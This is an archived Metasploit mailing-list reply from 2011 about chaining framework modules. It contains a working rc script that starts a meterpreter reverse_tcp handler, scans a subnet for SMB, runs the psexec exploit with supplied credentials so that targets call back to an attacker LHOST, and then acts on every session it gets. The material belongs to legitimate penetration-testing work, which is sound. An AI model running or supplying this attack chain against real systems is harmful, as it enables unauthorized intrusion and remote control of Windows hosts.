Metasploit mailing list archives
Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future?
From: Jonathan Cran <jcran () 0x0e org>
Date: Mon, 28 Nov 2011 12:31:38 -0600
On Mon, Nov 28, 2011 at 9:27 AM, Tod Beardsley <todb () metasploit com> wrote:
When i write an auxillary module , is it possible to make an attack such that , two modules or attacks can be combined to one attack with real time change in (run_timed,etc ) value for each modules to process?Sorry, I'm not sure what you're asking. In terms of doing things in response to network conditions, it's totally possible to control behavior based on packets received -- maybe the Bailiwicked modules do something like what you want? https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/spoof/dns/bailiwicked_domain.rb If you're looking for something like, "When Module X is successful, run Module Y, otherwise, run Module Z" then I imagine you could automate something like that via an rc script that does some <ruby> evaluation in between each module. I don't have an example handy, though.
If you're interested in the latter case, you might want to take a look into example RC published by darkoperator (http://www.darkoperator.com/), or kernelsmith / myself (at http://blog.pentestify.com). The original post on how to automate the console (http://blog.metasploit.com/2010/03/automating-metasploit-console.html) will prove useful reading as well. Here's a contrived rc file which runs two modules based on a condition. <CODE> # Set up a handler use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST z.z.z.z set LPORT 4444 exploit -z -j # Run a scanner module use auxiliary/scanner/smb_version set RHOSTS x.x.x.x/24 run # Sleep til something happens - just an example <ruby> select(nil, nil, nil,1) until framework.db.workspace.services.find_all_by_state("open") </ruby> # Run an exploit module - note that this could be done for all hosts # matching a certain condition w/ a ruby block and a looped run_single() use windows/smb/psexec set RHOST x.x.x.x set SMBUser abc set SMBPass def set PAYLOAD windows/meterpreter/reverse_tcp set LHOST z.z.z.z exploit -z # Interact with all generated sessions <ruby> framework.sessions.each do |session| # sessions look like: [0, <session_obj>] session_num = session.first session_obj = session.last # tell the console to operate on this session # and run the current module against it. run_single ("set SESSION #{session_num}") run_single ("run") end </ruby> </CODE> _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Prabhakaran Kasinathan (Nov 28)
- Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Tod Beardsley (Nov 28)
- Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Jonathan Cran (Nov 28)
- Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Prabhakaran Kasinathan (Nov 30)
- Message not available
- Fwd: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Joshua Smith (Nov 30)
- Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Jonathan Cran (Nov 28)
- Re: Will Packetfu Support 802.15.4 and other WSN protocols (6LowPan) in future? Tod Beardsley (Nov 28)